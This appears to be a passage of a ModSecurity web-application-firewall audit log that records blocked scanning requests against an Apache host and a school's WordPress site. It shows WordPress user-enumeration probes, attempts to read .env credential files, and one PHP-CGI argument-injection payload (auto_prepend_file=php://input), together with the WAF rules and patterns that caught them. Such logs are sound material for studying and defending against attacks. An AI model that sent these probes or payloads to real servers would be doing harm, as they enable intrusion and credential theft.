(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --28d0e469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28d0e469-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748609614375699 3012 (- - -) Stopwatch2: 1748609614375699 3012; combined=1404, p1=526, p2=842, p3=0, p4=0, p5=36, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28d0e469-Z-- --0aada826-A-- [30/May/2025:20:01:52 +0700] aDmsQAYacg5Rp_mEAa2sygAAAFY 103.236.140.4 38044 103.236.140.4 8181 --0aada826-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 111.160.79.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 111.160.79.114 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --0aada826-C-- --0aada826-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0aada826-E-- --0aada826-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748610112153222 4383 (- - -) Stopwatch2: 1748610112153222 4383; combined=3135, p1=492, p2=2546, p3=0, p4=0, p5=97, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0aada826-Z-- --3250576c-A-- [30/May/2025:21:07:46 +0700] aDm7snC_Owo8zPtYGR1YsQAAANg 103.236.140.4 37744 103.236.140.4 8181 --3250576c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.1.225 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.1.225 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3250576c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3250576c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748614066335007 908 (- - -) Stopwatch2: 1748614066335007 908; combined=358, p1=316, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3250576c-Z-- --3e04c923-A-- [30/May/2025:21:49:46 +0700] aDnFisYFzUaFKnNpI2CGzQAAAQc 103.236.140.4 35646 103.236.140.4 8181 --3e04c923-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.249.138.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.249.138.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3e04c923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e04c923-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748616586504720 2783 (- - -) Stopwatch2: 1748616586504720 2783; combined=1283, p1=445, p2=804, p3=0, p4=0, p5=33, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e04c923-Z-- --9ab34f16-A-- [30/May/2025:22:15:25 +0700] aDnLjUCWxJfHX2QfsdUQgwAAAIc 103.236.140.4 50722 103.236.140.4 8181 --9ab34f16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.216.85.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.216.85.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ab34f16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ab34f16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748618125824681 2292 (- - -) Stopwatch2: 1748618125824681 2292; combined=1247, p1=389, p2=829, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab34f16-Z-- --53744b48-A-- [30/May/2025:22:35:05 +0700] aDnQKQYacg5Rp_mEAa3K5QAAAFQ 103.236.140.4 49836 103.236.140.4 8181 --53744b48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --53744b48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53744b48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748619305078835 3081 (- - -) Stopwatch2: 1748619305078835 3081; combined=1479, p1=494, p2=954, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53744b48-Z-- --992e362c-A-- [30/May/2025:22:38:12 +0700] aDnQ5ECWxJfHX2QfsdUXHQAAAIs 103.236.140.4 54046 103.236.140.4 8181 --992e362c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 Accept-Charset: utf-8 --992e362c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --992e362c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748619492230435 832 (- - -) Stopwatch2: 1748619492230435 832; combined=360, p1=318, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --992e362c-Z-- --819efe3d-A-- [30/May/2025:22:58:01 +0700] aDnViQYacg5Rp_mEAa3R8gAAAE8 103.236.140.4 51752 103.236.140.4 8181 --819efe3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --819efe3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --819efe3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748620681759193 777 (- - -) Stopwatch2: 1748620681759193 777; combined=348, p1=305, p2=0, p3=0, p4=0, p5=42, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --819efe3d-Z-- --1c5ae943-A-- [30/May/2025:23:09:59 +0700] aDnYVwYacg5Rp_mEAa3VvwAAAFg 103.236.140.4 39846 103.236.140.4 8181 --1c5ae943-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c5ae943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c5ae943-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748621399941744 4223 (- - -) Stopwatch2: 1748621399941744 4223; combined=2201, p1=693, p2=1472, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c5ae943-Z-- --2d4a0c70-A-- [30/May/2025:23:53:04 +0700] aDnicMYFzUaFKnNpI2Ct4QAAARQ 103.236.140.4 41522 103.236.140.4 8181 --2d4a0c70-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2d4a0c70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d4a0c70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748623984753362 800 (- - -) Stopwatch2: 1748623984753362 800; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d4a0c70-Z-- --cc96316e-A-- [31/May/2025:00:00:50 +0700] aDnkQsYFzUaFKnNpI2CwxQAAAQM 103.236.140.4 52246 103.236.140.4 8181 --cc96316e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cc96316e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc96316e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748624450719205 3086 (- - -) Stopwatch2: 1748624450719205 3086; combined=1378, p1=460, p2=889, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc96316e-Z-- --c246757f-A-- [31/May/2025:00:23:05 +0700] aDnpeUCWxJfHX2QfsdUySgAAAIc 103.236.140.4 52098 103.236.140.4 8181 --c246757f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.140.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.140.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c246757f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c246757f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748625785880490 2774 (- - -) Stopwatch2: 1748625785880490 2774; combined=1364, p1=440, p2=897, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c246757f-Z-- --cdac5269-A-- [31/May/2025:00:32:03 +0700] aDnrkwYacg5Rp_mEAa3rlgAAAFE 103.236.140.4 35186 103.236.140.4 8181 --cdac5269-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.3 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --cdac5269-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdac5269-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748626323339312 806 (- - -) Stopwatch2: 1748626323339312 806; combined=323, p1=280, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdac5269-Z-- --6446232a-A-- [31/May/2025:00:37:24 +0700] aDns1FIXp1x3knXz7CgX6AAAAAQ 103.236.140.4 41894 103.236.140.4 8181 --6446232a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.255.241.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.255.241.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6446232a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6446232a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748626644601858 3231 (- - -) Stopwatch2: 1748626644601858 3231; combined=1411, p1=479, p2=901, p3=0, p4=0, p5=30, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6446232a-Z-- --281fc077-A-- [31/May/2025:00:49:38 +0700] aDnvslIXp1x3knXz7CgccwAAAAY 103.236.140.4 57542 103.236.140.4 8181 --281fc077-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.116.155.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.116.155.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --281fc077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281fc077-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748627378126720 2321 (- - -) Stopwatch2: 1748627378126720 2321; combined=1285, p1=408, p2=844, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281fc077-Z-- --d10b322f-A-- [31/May/2025:01:10:27 +0700] aDn0k8YFzUaFKnNpI2DBqQAAAQ0 103.236.140.4 56648 103.236.140.4 8181 --d10b322f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 93.175.248.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.175.248.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d10b322f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d10b322f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748628627379244 2535 (- - -) Stopwatch2: 1748628627379244 2535; combined=1252, p1=435, p2=781, p3=0, p4=0, p5=36, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d10b322f-Z-- --330c1279-A-- [31/May/2025:01:24:06 +0700] aDn3xnC_Owo8zPtYGR2YKwAAANI 103.236.140.4 47048 103.236.140.4 8181 --330c1279-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.185.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.185.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --330c1279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --330c1279-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748629446794780 3136 (- - -) Stopwatch2: 1748629446794780 3136; combined=1572, p1=566, p2=976, p3=0, p4=0, p5=30, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --330c1279-Z-- --72a3400d-A-- [31/May/2025:01:42:23 +0700] aDn8D0CWxJfHX2QfsdVJdgAAAIA 103.236.140.4 43838 103.236.140.4 8181 --72a3400d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.133.76.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.133.76.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --72a3400d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72a3400d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748630543111053 3213 (- - -) Stopwatch2: 1748630543111053 3213; combined=1877, p1=520, p2=1332, p3=0, p4=0, p5=25, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 